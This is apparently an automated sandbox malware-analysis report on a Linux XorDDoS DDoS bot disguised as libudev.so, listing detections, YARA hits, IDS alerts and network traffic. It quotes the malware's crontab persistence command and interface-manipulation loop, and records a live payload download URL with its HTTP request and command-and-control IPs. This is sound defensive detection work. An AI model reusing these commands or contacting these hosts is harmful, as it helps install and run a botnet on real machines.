        • 0x6b1e4:$st0: BB2FA36AAA9541F0
        • 0x6b1f4:$st0: BB2FA36AAA9541F0
        • 0x6b204:$st0: BB2FA36AAA9541F0
        Click to see the 36 entries
        SourceRuleDescriptionAuthorStrings
        6459.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
          6459.1.0000000008048000.00000000080cf000.r-x.sdmpMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
          • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
          • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
          • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
          • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
          6391.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
            6391.1.0000000008048000.00000000080cf000.r-x.sdmpMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
            • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
            • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
            • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
            • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
            6303.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
              Click to see the 237 entries
              Timestamp:192.168.2.2354.36.15.9957652802021336 07/09/22-18:43:50.434118
              SID:2021336
              Source Port:57652
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2354.36.15.9645690532020381 07/09/22-18:43:50.618138
              SID:2020381
              Source Port:45690
              Destination Port:53
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: libudev.soAvira: detected
              Source: libudev.soVirustotal: Detection: 71%Perma Link
              Source: libudev.soMetadefender: Detection: 64%Perma Link
              Source: libudev.soReversingLabs: Detection: 87%
              Source: /usr/bin/hfdnmorvjdAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/trcmbxxctaAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/mljnlxkfffAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/ypclxoxcxkAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/fsqerkomugAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/jjfbelholvAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/cjrbrkowirAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/ctwojuywolAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/bnuowhwlvcAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/chrcfbeejhAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /etc/init.d/libudev.soAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/uijxdyxacoAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/uhyqxsqeceAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/tiupbsaswrAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/hfdnmorvjdJoe Sandbox ML: detected
              Source: /usr/bin/trcmbxxctaJoe Sandbox ML: detected
              Source: /usr/bin/mljnlxkfffJoe Sandbox ML: detected
              Source: /usr/bin/ypclxoxcxkJoe Sandbox ML: detected
              Source: /usr/bin/fsqerkomugJoe Sandbox ML: detected
              Source: /usr/bin/jjfbelholvJoe Sandbox ML: detected
              Source: /usr/bin/cjrbrkowirJoe Sandbox ML: detected
              Source: /usr/bin/ctwojuywolJoe Sandbox ML: detected
              Source: /usr/bin/bnuowhwlvcJoe Sandbox ML: detected
              Source: /usr/bin/chrcfbeejhJoe Sandbox ML: detected
              Source: /etc/init.d/libudev.soJoe Sandbox ML: detected
              Source: /usr/bin/uijxdyxacoJoe Sandbox ML: detected
              Source: /usr/bin/uhyqxsqeceJoe Sandbox ML: detected
              Source: /usr/bin/tiupbsaswrJoe Sandbox ML: detected
              Source: libudev.soJoe Sandbox ML: detected
              Source: libudev.soMalware Configuration Extractor: XorDDoS {"C2 list": []}
              Source: /tmp/libudev.so (PID: 6231)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

              Networking

              barindex
              Source: TrafficSnort IDS: 2021336 ET TROJAN DDoS.XOR Checkin via HTTP 192.168.2.23:57652 -> 54.36.15.99:80
              Source: TrafficSnort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.23:45690 -> 54.36.15.96:53
              Source: global trafficTCP traffic: 192.168.2.23:45690 -> 54.36.15.96:53
              Source: global trafficTCP traffic: 192.168.2.23:38648 -> 51.89.52.12:53
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 51.89.52.12
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: libudev.so, hfdnmorvjd.11.dr, trcmbxxcta.11.dr, mljnlxkfff.11.dr, ypclxoxcxk.11.dr, fsqerkomug.11.dr, jjfbelholv.11.dr, cjrbrkowir.11.dr, ctwojuywol.11.dr, bnuowhwlvc.11.dr, chrcfbeejh.11.dr, libudev.so0.11.dr, uijxdyxaco.11.dr, uhyqxsqece.11.dr, tiupbsaswr.11.drString found in binary or memory: http://www.gnu.org/software/libc/bugs.html
              Source: libudev.so, 6230.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6232.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6233.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6234.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6263.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6266.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6268.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6271.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6273.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6280.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6283.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6286.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6289.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6291.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6298.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6301.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6303.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6306.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6309.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6315.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6318.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar
              Source: libudev.so, 6230.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6232.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6233.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6234.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t
              Source: libudev.so, 6441.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6444.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6447.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6450.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6452.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bn
              Source: libudev.so, 6459.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6462.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6464.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6468.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6470.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ch
              Source: libudev.so, 6351.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6354.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6356.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6359.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6362.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cj
              Source: libudev.so, 6315.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6318.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6321.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6324.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6327.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ct
              Source: libudev.so, 6530.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6533.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6536.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6539.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6541.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cu
              Source: libudev.so, 6334.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6337.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6339.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6342.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6345.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9fs
              Source: libudev.so, 6476.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6479.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6482.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6484.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6489.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hf
              Source: libudev.so, 6512.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6515.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6517.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6520.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6523.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hr
              Source: libudev.so, 6280.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6283.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6286.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6289.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6291.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9jj
              Source: libudev.so, 6263.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6266.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6268.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6271.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6273.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ml
              Source: libudev.so, 6495.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6498.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6501.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6503.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6506.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9mo
              Source: libudev.so, 6407.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6410.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6413.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6415.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6418.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ti
              Source: libudev.so, 6298.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6301.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6303.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6306.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6309.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tr
              Source: libudev.so, 6388.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6391.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6393.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6396.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6399.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9uh
              Source: libudev.so, 6424.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6427.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6430.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6432.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6435.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ui
              Source: libudev.so, 6369.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6372.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6375.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6377.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6380.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yp
              Source: libudev.so, 6548.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6551.1.00000000ffc1f000.00000000ffc40000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9zp
              Source: unknownDNS traffic detected: queries for: www1.gggatat456.com
              Source: global trafficHTTP traffic detected: GET /dd.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: www1.gggatat456.comConnection: Keep-Alive

              DDoS

              barindex
              Source: Yara matchFile source: libudev.so, type: SAMPLE
              Source: Yara matchFile source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6479.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6515.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6498.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6413.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6289.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6541.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6396.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6407.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6501.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6324.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6321.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6234.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6462.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6489.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6539.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6286.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6334.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6476.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6399.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6468.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6484.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6495.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6536.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6410.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6230, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6233, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6234, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6263, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6266, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6268, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6271, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6273, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6280, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6283, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6286, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6289, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6291, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6298, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6301, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6303, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6306, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6309, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6315, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6318, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6321, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6324, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6327, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6334, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6337, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6339, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6342, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6345, type: MEMORYSTR
